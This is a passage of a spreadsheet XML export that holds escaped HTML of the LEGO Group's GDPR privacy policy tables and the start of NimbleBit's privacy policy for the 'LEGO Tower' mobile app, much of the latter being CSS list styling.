Group.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Customer Service&lt;/strong&gt; includes calls or online chats with our Customer Service personnel.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Retail stores,&lt;/strong&gt; which includes stores managed by or for the LEGO Group.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Online registration forms&lt;/strong&gt; including LEGO® Account registration, VIP loyalty program registration, LEGO Life magazine subscriptions.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Offline registration forms&lt;/strong&gt; includes printed registration and similar forms that we collect via, for example, postal mail, in-store demos, contests and other promotions, or events.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Online consumer contests and sweepstakes&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt; Our VIP loyalty program&lt;/strong&gt; including your activities within the program.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Research&lt;/strong&gt; in which you and/or your children may participate, both in person and online.&lt;/li&gt;&lt;/ul&gt;&lt;h3 id=personal-data-the-lego-group-may-collect-from-third-parties&gt;Personal data the LEGO Group may collect from third parties&lt;/h3&gt;&lt;p&gt;We may receive personal data about you from various third parties and public sources as set out below:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;Technical Data&lt;/strong&gt; from the following parties:&lt;/li&gt;&lt;/ul&gt;&lt;ol&gt;&lt;li&gt;analytics providers;&lt;/li&gt;&lt;li&gt;advertising networks; and&lt;/li&gt;&lt;li&gt;search information providers.&lt;/li&gt;&lt;/ol&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;Contact, Financial and Transaction Data&lt;/strong&gt; from providers of technical, payment and delivery services.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Identity and Contact Data&lt;/strong&gt; from data brokers or aggregators.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Identity and Contact Data&lt;/strong&gt; from publicly available sources.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Identity, Contact and Purchaser Data&lt;/strong&gt; from retail and entertainment partners such as Merlin Entertainments and LEGO Certified Store partners.&lt;/li&gt;&lt;/ul&gt;&lt;h3 id=how-does-the-lego-group-use-your-personal-data&gt;How does the LEGO Group use your personal data?&lt;/h3&gt;&lt;h4 id=purposes-and-legal-bases-for-processing&gt;Purposes and legal bases for processing&lt;/h4&gt;&lt;head&gt;&lt;style&gt;table,th,td{border:1px solid lightgrey;border-collapse:collapse;text-align:left;vertical-align:top;width:25%;&lt;p&gt;}&lt;br&gt;th{&lt;br&gt; background: lightgrey;&lt;br&gt;}&lt;br&gt;&lt;/style&gt;&lt;/p&gt;&lt;/head&gt;&lt;details&gt;&lt;summary&gt;&lt;b&gt;LEGO® apps and online channels&lt;/b&gt;&lt;/summary&gt;&lt;table style=width:100%&gt;&lt;tr&gt;&lt;th&gt;What you do&lt;/th&gt;&lt;th&gt; What we collect&lt;/th&gt;&lt;th&gt;</t>
  </si>
  <si>
    <t>Why we collect it&lt;/th&gt;&lt;th&gt;Legal Basis&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Use a LEGO® app or online channel&lt;/td&gt;&lt;td&gt;&lt;ul&gt;&lt;li&gt;Technical data&lt;/li&gt;&lt;li&gt;Usage data&lt;/li&gt;&lt;li&gt;Additionally, data is collected using cookies* on our apps or websites (to the extent you have consented to the use of cookies). See Section 3 of this Policy or our &lt;a href=https://www.lego.com/legal/cookies/cookie-policy/&gt;Cookie Policy&lt;/a&gt; for more information about how cookies work and what types of data they collect.&lt;/li&gt;&lt;li&gt;If you want to set up a LEGO® Account for use on our apps and online channels, we process certain Identity Data, Contact Data and Profile Data, which is provided by you when signing up for a LEGO Account or editing your profile.&lt;/li&gt;&lt;/ul&gt;*If a child under the age of 16 accesses an online channel that is designed for children by using an age gate, we will obtain parental consent before collecting any personal information from the child (see Section 4 in this Policy for further information).&lt;/td&gt;&lt;td&gt;&lt;ul&gt;&lt;li&gt;To optimize the user experience and the functionality of our apps and&lt;/li&gt;&lt;li&gt;To deliver tailored marketing, including retargeting, if you have provided us with your consent (see our &lt;a href=https://www.lego.com/legal/cookies/cookie-declaration/&gt;Cookie Declaration&lt;/a&gt; for more information)&lt;/li&gt;&lt;li&gt;To improve and tailor your experience on our apps, websites, and services (like the LEGO® VIP program and the LEGO.com Preference Center)&lt;/li&gt;&lt;li&gt;To ensure that content from our apps and websites is optimized for you and for your computer or device&lt;/li&gt;&lt;li&gt;To allow you to participate in interactive features when you choose to do so&lt;/li&gt;&lt;li&gt;To help you set up a LEGO® Account&lt;/li&gt;&lt;li&gt;To verify and document that the creator of a LEGO® Account is not a child under the age of 16.&lt;/li&gt;&lt;li&gt;To be able to generate statistics and insights based on Aggregated Data to understand the health of our business and measuring the effectiveness of our advertising campaigns and promotions&lt;/li&gt;&lt;li&gt;To give you relevant marketing both when engaging with us in our own channels as well as via third-party channels (e.g. social media, search sites, market places)&lt;/li&gt;&lt;li&gt;To find/recruit potential new customers that look like our current customers&lt;/li&gt;&lt;/ul&gt;&lt;/td&gt;&lt;td&gt;&lt;ul&gt;&lt;li&gt;Your consent, art. 6(1)(a), GDPR, in connection with our use of cookies (to the extent such consent is provided)&lt;/li&gt;&lt;li&gt;Legitimate interest, art.</t>
  </si>
  <si>
    <t>6(1)(f), GDPR. Our legitimate interest is to be able to optimize and improve our apps and online channels, to be as relevant to our consumers as possible in our marketing efforts both in our own channels as well as in third-party channels, to ensure that our apps and websites are running smoothly for consumers, and to ensure that we process no personal data of a child under the age of 16 without parental consent.&lt;/li&gt;&lt;/ul&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/details&gt;&lt;br&gt;&lt;details&gt;&lt;summary&gt;&lt;b&gt;Order fulfillment&lt;/b&gt;&lt;/summary&gt;&lt;table style=width:100%&gt;&lt;tr&gt;&lt;th&gt;What you do&lt;/th&gt;&lt;th&gt; What we collect&lt;/th&gt;&lt;th&gt;</t>
  </si>
  <si>
    <t>Why we collect it&lt;/th&gt;&lt;th&gt;Legal Basis&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Place an order with us&lt;/td&gt;&lt;td&gt;&lt;ul&gt;&lt;li&gt;Identity Data and Contact Data&lt;/li&gt;&lt;li&gt;Purchaser Data&lt;/li&gt;&lt;li&gt;Financial Data&lt;/li&gt;&lt;li&gt;If you want to set up a LEGO® Account for use on our apps and online channels, we process certain Identity Data, Contact Data and Profile Data, which is provided by you when signing up for a LEGO Account or editing your profile.&lt;/li&gt;&lt;li&gt;Transaction Data&lt;/li&gt;&lt;li&gt;Technical Data&lt;/li&gt;&lt;/ul&gt;&lt;/td&gt;&lt;td&gt;&lt;ul&gt;&lt;li&gt;To fulfil the purchasing agreement made with you, which includes processing and shipping your orders and administering your rights to return goods or file a complaint&lt;/li&gt;&lt;li&gt;To be compliant with legislation concerning e.g. product recalls, bookkeeping and consumer rights&lt;/li&gt;&lt;li&gt;To know who our shoppers are&lt;/li&gt;&lt;li&gt;To allow you to store your Payment Data, Identity Data and Contact Data or similar for ease of future purchases or interactions with us&lt;/li&gt;&lt;li&gt;To conduct fraud prevention activities&lt;/li&gt;&lt;/ul&gt;&lt;/td&gt;&lt;td&gt;&lt;ul&gt;&lt;li&gt; Performance of a contract, art. 6(1)(b), GDPR, in relation to our mutual purchasing agreement&lt;/li&gt;&lt;li&gt;Legal obligation, art.</t>
  </si>
  <si>
    <t>6(1)(c), GDPR, in relation to our compliance with legislation concerning e.g. product recalls, bookkeeping and consumer rights&lt;/li&gt;&lt;li&gt;Legitimate interest, art. 6(1)(f), GDPR. Our legitimate interest in knowing our shoppers and provide them with a seamless shopping experience&lt;/li&gt;&lt;li&gt;Legitimate interest, art.</t>
  </si>
  <si>
    <t>6(1)(f), GDPR. Our legitimate interest is to prevent fraudulent activities in connection with purchases made on our websites&lt;/li&gt;&lt;/ul&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/details&gt;&lt;br&gt;&lt;details&gt;&lt;summary&gt;&lt;b&gt;Customer support&lt;/b&gt;&lt;/summary&gt;&lt;table style=width:100%&gt;&lt;tr&gt;&lt;th&gt;What you do&lt;/th&gt;&lt;th&gt;What we collect&lt;/th&gt;&lt;th&gt; Why we collect it&lt;/th&gt;&lt;th&gt;Legal Basis&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Interact with our customer support functions&lt;/td&gt;&lt;td&gt;&lt;ul&gt;&lt;li&gt;Identity Data and Contact Data&lt;/li&gt;&lt;li&gt;Transaction Data&lt;/li&gt;&lt;li&gt;Usage Data&lt;/li&gt;&lt;li&gt;Technical Data and Information about technical issues&lt;/li&gt;&lt;li&gt;Product questions/complaints&lt;/li&gt;&lt;li&gt;Feedback (e.g. relayed via our communication channels or social media)&lt;/li&gt;&lt;li&gt;General questions&lt;/li&gt;&lt;li&gt;Other information or content regarding the reason for your inquiry&lt;/li&gt;&lt;/ul&gt;&lt;/td&gt;&lt;td&gt;&lt;ul&gt;&lt;li&gt;To provide you with support&lt;/li&gt;&lt;li&gt;To locate orders or send you replacements&lt;/li&gt;&lt;li&gt;To gain insights on how we can improve our products and services&lt;/li&gt;&lt;li&gt;To act according to applicable law in responding to consumer complaints&lt;/li&gt;&lt;li&gt;To fulfil the agreement we have made with your regarding your purchase from us&lt;/li&gt;&lt;/ul&gt;&lt;/td&gt;&lt;td&gt;&lt;ul&gt;&lt;li&gt;Your Consent, art.</t>
  </si>
  <si>
    <t>6(1)(a) , GDPR, when you contact our customer support and provide us with information about your support request&lt;/li&gt;&lt;li&gt;Legitimate interest, art. 6(1)(f), GDPR.</t>
  </si>
  <si>
    <t>Our legitimate interest is to optimize our customer services and products&lt;/li&gt;&lt;li&gt;Legal obligation, art. 6(1)(c), GDPR, in connection to our compliance with legislation&lt;/li&gt;&lt;li&gt;Performance of a contract, art. 6(1)(b), GDPR, in relation to our mutual purchasing agreement&lt;/li&gt;&lt;/ul&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/details&gt;&lt;br&gt;&lt;details&gt;&lt;summary&gt;&lt;b&gt;Digital Marketing communications (e.g email, SMS, push messages or similar direct marketing)&lt;/b&gt;&lt;/summary&gt;&lt;table style=width:100%&gt;&lt;tr&gt;&lt;th&gt;What you do&lt;/th&gt;&lt;th&gt;</t>
  </si>
  <si>
    <t>What we collect&lt;/th&gt;&lt;th&gt; Why we collect it&lt;/th&gt;&lt;th&gt;Legal Basis&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;ul&gt;&lt;li&gt;Subscribe to one or more of our digital marketing communications where opt-in subscription is legally required&lt;/li&gt;&lt;li&gt;Have not opted out of receiving one or more of our digital marketing communications or our newsletters&lt;/li&gt;&lt;/ul&gt;&lt;/td&gt;&lt;td&gt;&lt;ul&gt;&lt;li&gt;Marketing and Communications Data&lt;/li&gt;&lt;li&gt;Necessary Identity Data&lt;/li&gt;&lt;li&gt;Information about which type of marketing communication you open and how you engage with the content&lt;/li&gt;&lt;/ul&gt;&lt;/td&gt;&lt;td&gt;&lt;ul&gt;&lt;li&gt;To be able to deliver our digital marketing communications to you&lt;/li&gt;&lt;li&gt;To run internal statistics and gain insights and to optimize and tailor both the content and delivery of our communications newsletter to those who want to receive it&lt;/li&gt;&lt;li&gt;To give you relevant marketing based on your interests and preferences both when engaging with us in our own LEGO® branded channels as well as via third-party channels (e.g. social media, search sites, market places)&lt;/li&gt;&lt;li&gt;To find/recruit potential new customers that look like our current customers (‘look alike’) or ensure that our current customers are not targeted with irrelevant marketing messages (‘suppression’)&lt;/li&gt;&lt;/ul&gt;&lt;/td&gt;&lt;td&gt;&lt;ul&gt;&lt;li&gt;Your consent, art. 6(1)(a), GDPR, which is provided upon your subscription to the marketing communication&lt;/li&gt;&lt;li&gt;Our legitimate interest, art.</t>
  </si>
  <si>
    <t>6(1)(f), GDPR in understanding our marketing effectiveness outside our own channels (e.g. via social media, search engines or market places)&lt;/li&gt;&lt;li&gt;Your consent, art. 6(1)(a), GDPR to allow us to target you with personalized marketing outside of our own branded channels (e.g. via social media, search engines or market places)&lt;/li&gt;&lt;li&gt;Legitimate interest, art. 6(1)(f), GDPR.</t>
  </si>
  <si>
    <t>Our legitimate interest in providing you with relevant content of your marketing message based on aggregated insights from shoppers and users on our website&lt;/li&gt;&lt;li&gt;Legitimate interest, art. 6(1)(f), GDPR. Our legitimate interest is to get statistics for internal use to improve our products and services&lt;/li&gt;&lt;/ul&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/details&gt;&lt;br&gt;&lt;details&gt;&lt;summary&gt;&lt;b&gt;Catalogs&lt;/b&gt;&lt;/summary&gt;&lt;table style=width:100%&gt;&lt;tr&gt;&lt;th&gt;What you do&lt;/th&gt;&lt;th&gt;What we collect&lt;/th&gt;&lt;th&gt;Why we collect it&lt;/th&gt;&lt;th&gt;Legal Basis&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;ul&gt;&lt;li&gt;Actively shop on our website&lt;/li&gt;&lt;li&gt;Not opt out of receiving a catalog from us&lt;/li&gt;&lt;li&gt;Actively requested to receive a LEGO® catalog&lt;/li&gt;&lt;li&gt;Allow a third-party data broker to send you marketing catalogs&lt;/li&gt;&lt;/ul&gt;&lt;/td&gt;&lt;td&gt;&lt;ul&gt;&lt;li&gt;Marketing and Communications Data&lt;/li&gt;&lt;li&gt;Necessary Identity and Contact Data&lt;/li&gt;&lt;/ul&gt;&lt;/td&gt;&lt;td&gt;&lt;ul&gt;&lt;li&gt;To send you our catalogs and to share with our third-party data brokers and data aggregators to ensure you are not being sent a LEGO® Catalog from both of us at the same time (also called data suppression) or forward your opt-out request to them (where they are data controllers of your personal data)&lt;/li&gt;&lt;li&gt;Based on aggregated data understand the relevance and effectiveness of our marketing towards you to find new customers that are similar to you&lt;/li&gt;&lt;/ul&gt;&lt;/td&gt;&lt;td&gt;&lt;ul&gt;&lt;li&gt;</t>
  </si>
  <si>
    <t>Our legitimate interest, art. 6(1)(f), GDPR, in sending you a catalog containing similar products to what you have purchased (allowing you subsequently to opt out)&lt;/li&gt;&lt;li&gt;Our legitimate interest, art. 6(1)(f), GDPR, in sending you the catalog you have expressly requested from us&lt;/li&gt;&lt;li&gt;Your consent, art 6(1)(a), GDPR, to allow us to use other data we have about you to specifically tailor the content of the catalog we send to you&lt;/li&gt;&lt;li&gt;Our legitimate interest, art.</t>
  </si>
  <si>
    <t>6(1)(f), GDPR, in ensuring a good LEGO® brand experience&lt;/li&gt;&lt;li&gt; Our legitimate interest, art. 6(1)(f), GDPR, in understanding the general marketing effectiveness of our catalogs.&lt;/li&gt;&lt;li&gt;Our legitimate interest, art.</t>
  </si>
  <si>
    <t>6(1)(f), GDPR, in using your data to better understand the characteristics and preferences of our existing custo</t>
  </si>
  <si>
    <t>&lt;html&gt;&lt;head&gt;&lt;meta content="text/html; charset=UTF-8" http-equiv="content-type"&gt;&lt;style type="text/css"&gt;.lst-kix_g4j7gzxtiqll-4&gt;li:before{content:"\0025cb  "}.lst-kix_1ez29bwdcl46-6&gt;li:before{content:"\0025cf  "}.lst-kix_1ez29bwdcl46-8&gt;li:before{content:"\0025a0  "}.lst-kix_xx0lnb3ltv3l-5&gt;li{counter-increment:lst-ctn-kix_xx0lnb3ltv3l-5}ol.lst-kix_xx0lnb3ltv3l-0.start{counter-reset:lst-ctn-kix_xx0lnb3ltv3l-0 0}.lst-kix_g4j7gzxtiqll-3&gt;li:before{content:"\0025cf  "}.lst-kix_g4j7gzxtiqll-7&gt;li:before{content:"\0025cb  "}.lst-kix_1ez29bwdcl46-7&gt;li:before{content:"\0025cb  "}ul.lst-kix_uomkm09zrrcw-3{list-style-type:none}ul.lst-kix_uomkm09zrrcw-4{list-style-type:none}ul.lst-kix_uomkm09zrrcw-1{list-style-type:none}ul.lst-kix_uomkm09zrrcw-2{list-style-type:none}.lst-kix_1ez29bwdcl46-2&gt;li:before{content:"\0025a0  "}.lst-kix_g4j7gzxtiqll-6&gt;li:before{content:"\0025cf  "}ul.lst-kix_uomkm09zrrcw-7{list-style-type:none}ul.lst-kix_uomkm09zrrcw-8{list-style-type:none}.lst-kix_1ez29bwdcl46-1&gt;li:before{content:"\0025cb  "}.lst-kix_g4j7gzxtiqll-5&gt;li:before{content:"\0025a0  "}ul.lst-kix_uomkm09zrrcw-5{list-style-type:none}ul.lst-kix_uomkm09zrrcw-6{list-style-type:none}.lst-kix_1ez29bwdcl46-0&gt;li:before{content:"\0025cf  "}ul.lst-kix_uomkm09zrrcw-0{list-style-type:none}.lst-kix_g4j7gzxtiqll-8&gt;li:before{content:"\0025a0  "}.lst-kix_xx0lnb3ltv3l-0&gt;li{counter-increment:lst-ctn-kix_xx0lnb3ltv3l-0}ol.lst-kix_xx0lnb3ltv3l-3.start{counter-reset:lst-ctn-kix_xx0lnb3ltv3l-3 0}.lst-kix_uomkm09zrrcw-0&gt;li:before{content:"\0025cf  "}.lst-kix_xx0lnb3ltv3l-8&gt;li:before{content:"" counter(lst-ctn-kix_xx0lnb3ltv3l-8,lower-roman) ". "}.lst-kix_uomkm09zrrcw-1&gt;li:before{content:"\0025cb  "}.lst-kix_xx0lnb3ltv3l-5&gt;li:before{content:"" counter(lst-ctn-kix_xx0lnb3ltv3l-5,lower-roman) ". "}ol.lst-kix_xx0lnb3ltv3l-6.start{counter-reset:lst-ctn-kix_xx0lnb3ltv3l-6 0}.lst-kix_uomkm09zrrcw-2&gt;li:before{content:"\0025a0  "}.lst-kix_uomkm09zrrcw-4&gt;li:before{content:"\0025cb  "}ol.lst-kix_xx0lnb3ltv3l-1{list-style-type:none}.lst-kix_xx0lnb3ltv3l-7&gt;li:before{content:"" counter(lst-ctn-kix_xx0lnb3ltv3l-7,lower-latin) ".</t>
  </si>
  <si>
    <t>"}ol.lst-kix_xx0lnb3ltv3l-2{list-style-type:none}.lst-kix_xx0lnb3ltv3l-6&gt;li:before{content:"" counter(lst-ctn-kix_xx0lnb3ltv3l-6,decimal) ". "}ol.lst-kix_xx0lnb3ltv3l-0{list-style-type:none}.lst-kix_uomkm09zrrcw-3&gt;li:before{content:"\0025cf  "}.lst-kix_xx0lnb3ltv3l-1&gt;li:before{content:"" counter(lst-ctn-kix_xx0lnb3ltv3l-1,lower-latin) ". "}.lst-kix_uomkm09zrrcw-6&gt;li:before{content:"\0025cf  "}.lst-kix_uomkm09zrrcw-8&gt;li:before{content:"\0025a0  "}.lst-kix_xx0lnb3ltv3l-0&gt;li:before{content:"" counter(lst-ctn-kix_xx0lnb3ltv3l-0,decimal) ".</t>
  </si>
  <si>
    <t>"}.lst-kix_xx0lnb3ltv3l-4&gt;li:before{content:"" counter(lst-ctn-kix_xx0lnb3ltv3l-4,lower-latin) ". "}ol.lst-kix_xx0lnb3ltv3l-2.start{counter-reset:lst-ctn-kix_xx0lnb3ltv3l-2 0}.lst-kix_uomkm09zrrcw-5&gt;li:before{content:"\0025a0  "}.lst-kix_xx0lnb3ltv3l-3&gt;li:before{content:"" counter(lst-ctn-kix_xx0lnb3ltv3l-3,decimal) ". "}.lst-kix_xx0lnb3ltv3l-2&gt;li:before{content:"" counter(lst-ctn-kix_xx0lnb3ltv3l-2,lower-roman) ".</t>
  </si>
  <si>
    <t>"}.lst-kix_xx0lnb3ltv3l-8&gt;li{counter-increment:lst-ctn-kix_xx0lnb3ltv3l-8}.lst-kix_uomkm09zrrcw-7&gt;li:before{content:"\0025cb  "}ol.lst-kix_xx0lnb3ltv3l-5.start{counter-reset:lst-ctn-kix_xx0lnb3ltv3l-5 0}.lst-kix_xx0lnb3ltv3l-2&gt;li{counter-increment:lst-ctn-kix_xx0lnb3ltv3l-2}ol.lst-kix_xx0lnb3ltv3l-5{list-style-type:none}.lst-kix_xx0lnb3ltv3l-7&gt;li{counter-increment:lst-ctn-kix_xx0lnb3ltv3l-7}ol.lst-kix_xx0lnb3ltv3l-8.start{counter-reset:lst-ctn-kix_xx0lnb3ltv3l-8 0}ol.lst-kix_xx0lnb3ltv3l-6{list-style-type:none}ol.lst-kix_xx0lnb3ltv3l-3{list-style-type:none}ol.lst-kix_xx0lnb3ltv3l-4{list-style-type:none}ul.lst-kix_g4j7gzxtiqll-8{list-style-type:none}ol.lst-kix_xx0lnb3ltv3l-7{list-style-type:none}ol.lst-kix_xx0lnb3ltv3l-8{list-style-type:none}ul.lst-kix_g4j7gzxtiqll-3{list-style-type:none}.lst-kix_xx0lnb3ltv3l-3&gt;li{counter-increment:lst-ctn-kix_xx0lnb3ltv3l-3}ul.lst-kix_g4j7gzxtiqll-2{list-style-type:none}ul.lst-kix_g4j7gzxtiqll-1{list-style-type:none}ul.lst-kix_g4j7gzxtiqll-0{list-style-type:none}ul.lst-kix_g4j7gzxtiqll-7{list-style-type:none}ul.lst-kix_g4j7gzxtiqll-6{list-style-type:none}ul.lst-kix_g4j7gzxtiqll-5{list-style-type:none}ul.lst-kix_g4j7gzxtiqll-4{list-style-type:none}ol.lst-kix_xx0lnb3ltv3l-4.start{counter-reset:lst-ctn-kix_xx0lnb3ltv3l-4 0}.lst-kix_xx0lnb3ltv3l-6&gt;li{counter-increment:lst-ctn-kix_xx0lnb3ltv3l-6}ul.lst-kix_1ez29bwdcl46-7{list-style-type:none}ul.lst-kix_1ez29bwdcl46-6{list-style-type:none}ul.lst-kix_1ez29bwdcl46-5{list-style-type:none}ul.lst-kix_1ez29bwdcl46-4{list-style-type:none}ol.lst-kix_xx0lnb3ltv3l-1.start{counter-reset:lst-ctn-kix_xx0lnb3ltv3l-1 0}ul.lst-kix_1ez29bwdcl46-8{list-style-type:none}.lst-kix_xx0lnb3ltv3l-4&gt;li{counter-increment:lst-ctn-kix_xx0lnb3ltv3l-4}ul.lst-kix_1ez29bwdcl46-3{list-style-type:none}.lst-kix_xx0lnb3ltv3l-1&gt;li{counter-increment:lst-ctn-kix_xx0lnb3ltv3l-1}ul.lst-kix_1ez29bwdcl46-2{list-style-type:none}ul.lst-kix_1ez29bwdcl46-1{list-style-type:none}.lst-kix_1ez29bwdcl46-3&gt;li:before{content:"\0025cf  "}ul.lst-kix_1ez29bwdcl46-0{list-style-type:none}.lst-kix_1ez29bwdcl46-4&gt;li:before{content:"\0025cb  "}.lst-kix_g4j7gzxtiqll-0&gt;li:before{content:"\0025cf  "}ol.lst-kix_xx0lnb3ltv3l-7.start{counter-reset:lst-ctn-kix_xx0lnb3ltv3l-7 0}.lst-kix_g4j7gzxtiqll-2&gt;li: before{content:"\0025a0  "}.lst-kix_1ez29bwdcl46-5&gt;li:before{content:"\0025a0  "}.lst-kix_g4j7gzxtiqll-1&gt;li:before{content:"\0025cb  "}ol{margin:0;padding:0}table td,table th{padding:0}.c13{border-right-style:solid;padding-top:0pt;border-top-width:0pt;border-bottom-color:null;border-right-width:0pt;padding-left:0pt;padding-bottom:0pt;line-height:1.15;border-right-color:null;border-top-style:solid;margin-left:89pt;border-bottom-width:0pt;border-top-color:null;border-bottom-style:solid;orphans:2;widows:2;text-align:left;padding-right:0pt}.c3{border-right-style:solid;padding-top:0pt;border-top-width:0pt;border-bottom-color:null;border-right-width:0pt;padding-left:0pt;padding-bottom:0pt;line-height:1.15;border-right-color:null;border-top-style:solid;margin-left:66pt;border-bottom-width:0pt;border-top-color:null;border-bottom-style:solid;orphans:2;widows:2;text-align:left;padding-right:0pt}.c14{border-right-style:solid;padding-top:0pt;border-top-width:0pt;border-bottom-color:null;border-right-width:0pt;padding-bottom:0pt;line-height:1.15;border-right-color:null;border-top-style:solid;border-bottom-width:0pt;border-top-color:null;border-bottom-style:solid;orphans:2;widows:2;text-align:left;padding-right:0pt;height:11pt}.c5{background-color:#fefefe;padding-top:0pt;padding-bottom:8pt;line-height:1.15;orphans:2;widows:2;text-align:left;height:11pt}.c6{background-color:#fefefe;padding-top:0pt;padding-bottom:8pt;line-height:1.15;orphans:2;widows:2;text-align:left}.c0{color:#333333;font-weight:700;text-decoration:none;vertical-align:baseline;font-size:11.5pt;font-family:"Arial";font-style:normal}.c16{padding-top:0pt;padding-bottom:0pt;line-height:1.15;orphans:2;widows:2;text-align:left;height:11pt}.c18{padding-top:0pt;padding-bottom:0pt;line-height:1.15;orphans:2;widows:2;text-align:left}.c4{font-weight:400;text-decoration:none;vertical-align:baseline;font-family:"Arial";font-style:normal}.c11{text-decoration-skip-ink:none;font-size:11.5pt;-webkit-text-decoration-skip:none;color:#1155cc;text-decoration:underline}.c9{background-color:#ffffff;max-width:468pt;padding:72pt 72pt 72pt</t>
  </si>
  <si>
    <t>72pt}.c7{color:inherit;text-decoration:inherit}.c1{padding:0;margin:0}.c2{color:#333333;font-size:11.5pt}.c15{margin-left:36pt;padding-left:0pt}.c8{color:#000000;font-size:11pt}.c12{background-color:#fefefe;vertical-align:super}.c10{font-weight:700}.c17{background-color:#fefefe}.title{padding-top:0pt;color:#000000;font-size:26pt;padding-bottom:3pt;font-family:"Arial";line-height:1.15;page-break-after:avoid;orphans:2;widows:2;text-align:left}.subtitle{padding-top:0pt;color:#666666;font-size:15pt;padding-bottom:16pt;font-family:"Arial";line-height:1.15;page-break-after:avoid;orphans:2;widows:2;text-align:left}li{color:#000000;font-size:11pt;font-family:"Arial"}p{margin:0;color:#000000;font-size:11pt;font-family:"Arial"}h1{padding-top:20pt;color:#000000;font-size:20pt;padding-bottom:6pt;font-family:"Arial";line-height:1.15;page-break-after:avoid;orphans:2;widows:2;text-align:left}h2{padding-top:18pt;color:#000000;font-size:16pt;padding-bottom:6pt;font-family:"Arial";line-height:1.15;page-break-after:avoid;orphans:2;widows:2;text-align:left}h3{padding-top:16pt;color:#434343;font-size:14pt;padding-bottom:4pt;font-family:"Arial";line-height:1.15;page-break-after:avoid;orphans:2;widows:2;text-align:left}h4{padding-top:14pt;color:#666666;font-size:12pt;padding-bottom:4pt;font-family:"Arial";line-height:1.15;page-break-after:avoid;orphans:2;widows:2;text-align:left}h5{padding-top:12pt;color:#666666;font-size:11pt;padding-bottom:4pt;font-family:"Arial";line-height:1.15;page-break-after:avoid;orphans:2;widows:2;text-align:left}h6{padding-top:12pt;color:#666666;font-size:11pt;padding-bottom:4pt;font-family:"Arial";line-height:1.15;page-break-after:avoid;font-style:italic;orphans:2;widows:2;text-align:left}&lt;/style&gt;&lt;/head&gt;&lt;body class="c9"&gt;&lt;p class="c18"&gt;&lt;span class="c2 c10 c17"&gt;LEGO&lt;/span&gt;&lt;span class="c2 c12 c10"&gt;&amp;#9415;&lt;/span&gt;&lt;span class="c0 c17"&gt;&amp;nbsp;Tower Privacy Policy&lt;/span&gt;&lt;/p&gt;&lt;p class="c6"&gt;&lt;span class="c2"&gt;This privacy policy discloses the privacy practices for the mobile application &lt;/span&gt;&lt;span class="c2 c17"&gt;LEGO&lt;/span&gt;&lt;span class="c2 c12"&gt;&amp;#9415;&lt;/span&gt;&lt;span class="c2"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="c4 c2"&gt;Tower, published by NimbleBit, LLC.</t>
  </si>
  <si>
    <t>This privacy policy applies solely to information collected by this application. It will notify you of the following:&lt;/span&gt;&lt;/p&gt;&lt;ol class="c1 lst-kix_xx0lnb3ltv3l-0 start" start="1"&gt;&lt;li class="c3"&gt;&lt;span class="c4 c2"&gt;What personally identifiable information is collected from you through the website, how it is used and with whom it may be shared.&lt;/span&gt;&lt;/li&gt;&lt;li class="c3"&gt;&lt;span class="c4</t>
  </si>
  <si>
    <t>c2"&gt;What choices are available to you regarding the use of your data.&lt;/span&gt;&lt;/li&gt;&lt;li class="c3"&gt;&lt;span class="c4 c2"&gt;The security procedures in place to protect the misuse of your information.&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c14"&gt;&lt;span class="c4 c2"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="c6"&gt;&lt;span class="c2 c10"&gt;Information Collection, Use, and Sharing&lt;/span&gt;&lt;span class="c4</t>
  </si>
  <si>
    <t>c2"&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;&lt;p class="c6"&gt;&lt;span class="c4 c2"&gt;We are the sole owners of the information collected by us through this application.</t>
  </si>
  <si>
    <t>We only have access to/collect information that you voluntarily give us via the application or other direct contact from you. We will not sell or rent this information to anyone.&lt;/span&gt;&lt;/p&gt;&lt;p class="c6"&gt;&lt;span class="c4 c2"&gt;We will use your information to provide in-game services and customer support. We will not share your information with any third party outside of our organization that is not disclosed in this policy.&lt;/span&gt;&lt;/p&gt;&lt;p class="c6"&gt;&lt;span class="c2"&gt;To request the viewing or removal of information we&amp;rsquo;ve collected contact &lt;/span&gt;&lt;span class="c11"&gt;&lt;a class="c7" href="mailto:support@nimblebit.com"&gt;support@nimblebit.com&lt;/a&gt;&lt;/span&gt;&lt;span class="c2"&gt;&amp;nbsp;from the email address connected to your game.&lt;/span&gt;&lt;/p&gt;&lt;p class="c5"&gt;&lt;span class="c4 c2"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="c6"&gt;&lt;span class="c0"&gt;LEGO ID&lt;/span&gt;&lt;/p&gt;&lt;p class="c6"&gt;&lt;span class="c4</t>
  </si>
  <si>
    <t>c2"&gt;This application gives the option of authenticating with LEGO ID. A player&amp;rsquo;s LEGO ID is used to backup game data to our servers and provide interaction with their LEGO ID friends. LEGO System A/S&amp;rsquo;s privacy policy is linked below.&lt;/span&gt;&lt;/p&gt;&lt;ul class="c1 lst-kix_1ez29bwdcl46-0</t>
  </si>
  <si>
